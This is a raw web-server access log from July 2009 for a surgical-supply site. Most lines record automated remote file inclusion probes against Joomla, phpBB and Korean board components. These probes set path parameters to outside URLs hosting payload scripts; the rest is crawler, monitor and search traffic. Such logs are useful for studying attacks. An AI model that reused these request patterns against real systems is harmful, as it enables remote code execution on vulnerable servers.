121.130.29.11 - - [26/Jul/2009:05:01:33 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.hisarkitabevi.com/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.130.29.11 - - [26/Jul/2009:05:01:33 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/comment_modify.php?dir=http://www.hisarkitabevi.com/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.130.29.11 - - [26/Jul/2009:05:01:33 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.hisarkitabevi.com/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
208.113.167.8 - - [26/Jul/2009:05:01:36 -0400] "GET /logs/access_log.Q109070200/include/bbs.lib.inc.php?site_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
211.189.119.171 - - [26/Jul/2009:05:01:42 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:05:01:42 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:05:01:43 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:05:01:44 -0400] "GET /logs/access_log.Q109071200///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
86.96.229.86 - - [26/Jul/2009:05:01:45 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):how%20to%20disinfect%20ti HTTP/1.1" 200 38029 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.232.54.48 - - [26/Jul/2009:05:01:46 -0400] "GET /logs/access_log.Q109070800/article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
201.232.54.48 - - [26/Jul/2009:05:01:49 -0400] "GET /article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
201.232.54.48 - - [26/Jul/2009:05:01:49 -0400] "GET /logs/article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
211.189.119.171 - - [26/Jul/2009:05:01:51 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:05:01:51 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:05:01:51 -0400] "GET /logs/access_log.Q109071500%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:05:01:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.113.167.8 - - [26/Jul/2009:05:01:58 -0400] "GET /logs/access_log.Q109070200/?site_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
123.213.63.137 - - [26/Jul/2009:05:02:04 -0400] "GET /logs/access_log.Q109071200///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.189.119.171 - - [26/Jul/2009:05:02:19 -0400] "GET /logs/access_log.Q109071200///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:05:02:30 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:05:02:30 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:05:02:30 -0400] "GET /logs/access_log.Q109071200///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.130.29.11 - - [26/Jul/2009:05:02:37 -0400] "GET /logs/access_log.Q109071200///skin/ggambo7002_board/comment_modify.php?dir=http://www.hisarkitabevi.com/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
212.193.229.157 - - [26/Jul/2009:05:02:44 -0400] "GET /logs/access_log.Q109070800/article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
212.193.229.157 - - [26/Jul/2009:05:02:44 -0400] "GET /article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
212.193.229.157 - - [26/Jul/2009:05:02:44 -0400] "GET /logs/article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
38.108.180.166 - - [26/Jul/2009:05:03:30 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
38.108.180.166 - - [26/Jul/2009:05:03:33 -0400] "GET /scripts/ HTTP/1.1" 200 802 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
131.203.76.246 - - [26/Jul/2009:05:04:57 -0400] "GET /logs/access_log.Q109062100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt????? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
86.96.229.86 - - [26/Jul/2009:05:06:00 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):titanium%20micro%20mesh HTTP/1.1" 200 50972 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.249.68.247 - - [26/Jul/2009:05:06:18 -0400] "GET /logs/access_log.Q108100400 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.213.63.137 - - [26/Jul/2009:05:06:46 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:05:06:46 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:05:06:46 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
123.213.63.137 - - [26/Jul/2009:05:07:16 -0400] "GET /logs/access_log.Q109071200///skin/ggambo7002_board/comment_modify.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:05:07:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [26/Jul/2009:05:07:34 -0400] "GET /images/_notes/ace_bkgrd_wide_r1_c1.jpg.mno HTTP/1.1" 200 265 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.191.35.118 - - [26/Jul/2009:05:07:36 -0400] "GET /logs/access_log.Q109053000//png.php?include_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
131.203.76.246 - - [26/Jul/2009:05:12:30 -0400] "GET /logs/access_log.Q109062100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt????? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:05:12:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [26/Jul/2009:05:14:09 -0400] "GET /images/_notes/ace_bkgrd_wide_r1_c2.jpg.mno HTTP/1.1" 200 263 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [26/Jul/2009:05:16:24 -0400] "GET /images/nav_store_cart_orng.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
209.59.12.99 - - [26/Jul/2009:05:17:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.113.167.8 - - [26/Jul/2009:05:20:11 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:20:11 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:20:11 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:20:30 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
66.249.68.247 - - [26/Jul/2009:05:20:43 -0400] "GET /images/_notes/banner_connect_off_r2_c1.gif.mno HTTP/1.1" 200 255 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.190.41.97 - - [26/Jul/2009:05:21:25 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:05:21:25 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:05:21:25 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:05:21:25 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
87.20.186.139 - - [26/Jul/2009:05:21:42 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:05:21:42 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:05:21:42 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.113.167.8 - - [26/Jul/2009:05:24:28 -0400] "GET /logs/access_log.Q109052700%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:24:28 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:24:28 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:24:28 -0400] "GET /logs/access_log.Q109061700%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:24:47 -0400] "GET /logs/access_log.Q109070300%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:25:37 -0400] "GET /logs/access_log.Q109061500//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:25:39 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:26:50 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:26:50 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:26:50 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:26:57 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
66.249.68.247 - - [26/Jul/2009:05:27:18 -0400] "GET /images/_notes/circle_get_it_over.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.109.101.217 - - [26/Jul/2009:05:30:55 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//back/test.txt? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
210.109.101.217 - - [26/Jul/2009:05:30:55 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//back/test.txt? HTTP/1.1" 404 236 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
117.110.74.195 - - [26/Jul/2009:05:30:58 -0400] "GET /logs/access_log.Q109050800////?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:05:30:58 -0400] "GET /logs////?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 11073 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:05:31:04 -0400] "GET /logs/access_log.Q109071200////?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:05:31:04 -0400] "GET /logs/access_log.Q109050800////?DOCUMENT_ROOT=http://www.youclinic.com/bbs/copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:05:31:04 -0400] "GET /logs////?DOCUMENT_ROOT=http://www.youclinic.com/bbs/copyright.txt? HTTP/1.1" 200 11073 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:05:31:12 -0400] "GET /logs/access_log.Q109071200////?DOCUMENT_ROOT=http://www.youclinic.com/bbs/copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.8.218 - - [26/Jul/2009:05:32:47 -0400] "GET /logs/access_log.Q109071100//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
69.175.8.218 - - [26/Jul/2009:05:32:47 -0400] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.175.8.218 - - [26/Jul/2009:05:32:47 -0400] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.175.8.218 - - [26/Jul/2009:05:33:17 -0400] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.175.8.218 - - [26/Jul/2009:05:33:17 -0400] "GET /logs/access_log.Q109071100//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
69.175.8.218 - - [26/Jul/2009:05:33:17 -0400] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:05:33:19 -0400] "GET /logs/access_log.Q109050800%20%20////?DOCUMENT_ROOT=http://www.youclinic.com/bbs/copyright.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:05:33:19 -0400] "GET /logs/access_log.Q109071200%20%20////?DOCUMENT_ROOT=http://www.youclinic.com/bbs/copyright.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:05:33:55 -0400] "GET /images/_notes/ace_bkgrd_wide_r3_c1.jpg.mno HTTP/1.1" 200 265 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.229.45.106 - - [26/Jul/2009:05:34:04 -0400] "GET /logs/access_log.Q109071100//ashnews.php?pathtoashnews=http://quetzal1.innsz.mx//components/com_joomlalib/idv6.txt?%0D?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
87.229.45.106 - - [26/Jul/2009:05:34:04 -0400] "GET //ashnews.php?pathtoashnews=http://quetzal1.innsz.mx//components/com_joomlalib/idv6.txt?%0D?? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
87.229.45.106 - - [26/Jul/2009:05:34:04 -0400] "GET /logs//ashnews.php?pathtoashnews=http://quetzal1.innsz.mx//components/com_joomlalib/idv6.txt?%0D?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
87.229.45.106 - - [26/Jul/2009:05:34:05 -0400] "GET /logs/error_log.Q109061000//ashnews.php?pathtoashnews=http://quetzal1.innsz.mx//components/com_joomlalib/idv6.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
117.110.74.195 - - [26/Jul/2009:05:34:11 -0400] "GET /logs/access_log.Q109050800%20%20////?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:05:34:11 -0400] "GET /logs/access_log.Q109071200%20%20////?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.8.218 - - [26/Jul/2009:05:34:59 -0400] "GET /logs/access_log.Q109071100%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.175.8.218 - - [26/Jul/2009:05:35:39 -0400] "GET /logs/access_log.Q109071100%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
74.6.22.173 - - [26/Jul/2009:05:35:47 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.173 - - [26/Jul/2009:05:35:47 -0400] "GET /logs/access_log.Q108061500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
59.24.49.35 - - [26/Jul/2009:05:36:20 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://creascience.com/components/com_sef/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
59.24.49.35 - - [26/Jul/2009:05:36:20 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://creascience.com/components/com_sef/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
59.24.49.35 - - [26/Jul/2009:05:36:20 -0400] "GET /logs/access_log.Q109071600//bemarket/postscript/postscript.php?p_mode=http://creascience.com/components/com_sef/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.46.48.194 - - [26/Jul/2009:05:37:40 -0400] "GET /cgi-bin/lansaweb HTTP/1.1" 408 514 "-" "Mozilla/4.0"
209.172.33.230 - - [26/Jul/2009:05:37:55 -0400] "GET /logs/access_log.Q109071200%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Jul/2009:05:37:55 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Jul/2009:05:37:55 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:05:37:59 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
69.13.208.131 - - [26/Jul/2009:05:37:59 -0400] "GET //main.php?sayfa=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
69.13.208.131 - - [26/Jul/2009:05:37:59 -0400] "GET /logs//main.php?sayfa=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
69.13.208.131 - - [26/Jul/2009:05:38:01 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
141.223.5.12 - - [26/Jul/2009:05:38:10 -0400] "GET /logs/access_log.Q109071600//bemarket/postscript/postscript.php?p_mode=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
59.24.49.35 - - [26/Jul/2009:05:38:10 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://creascience.com/components/com_sef/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
59.24.49.35 - - [26/Jul/2009:05:38:10 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://creascience.com/components/com_sef/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
141.223.5.12 - - [26/Jul/2009:05:38:10 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
59.24.49.35 - - [26/Jul/2009:05:38:11 -0400] "GET /logs/access_log.Q109071600//bemarket/postscript/postscript.php?p_mode=http://creascience.com/components/com_sef/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
141.223.5.12 - - [26/Jul/2009:05:38:16 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
209.172.33.230 - - [26/Jul/2009:05:38:36 -0400] "GET /logs/access_log.Q109060300%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
87.229.45.106 - - [26/Jul/2009:05:38:39 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://quetzal1.innsz.mx//components/com_joomlalib/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
87.229.45.106 - - [26/Jul/2009:05:38:39 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://quetzal1.innsz.mx//components/com_joomlalib/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
87.229.45.106 - - [26/Jul/2009:05:38:39 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://quetzal1.innsz.mx//components/com_joomlalib/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:05:38:41 -0400] "GET ////?DOCUMENT_ROOT=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:05:38:41 -0400] "GET /logs/access_log.Q109050800////?DOCUMENT_ROOT=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:05:38:41 -0400] "GET /logs////?DOCUMENT_ROOT=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 200 11073 "-" "Mozilla/5.0"
87.229.45.106 - - [26/Jul/2009:05:38:44 -0400] "GET /logs/error_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://quetzal1.innsz.mx//components/com_joomlalib/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:05:38:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.34.122 - - [26/Jul/2009:05:38:55 -0400] "GET /logs/access_log.Q109061800//index.php?sayfa=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
87.106.34.122 - - [26/Jul/2009:05:38:55 -0400] "GET //index.php?sayfa=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
87.106.34.122 - - [26/Jul/2009:05:38:55 -0400] "GET /logs//index.php?sayfa=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
220.231.126.252 - - [26/Jul/2009:05:38:57 -0400] "GET /logs/access_log.Q109071200////?DOCUMENT_ROOT=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:05:39:01 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
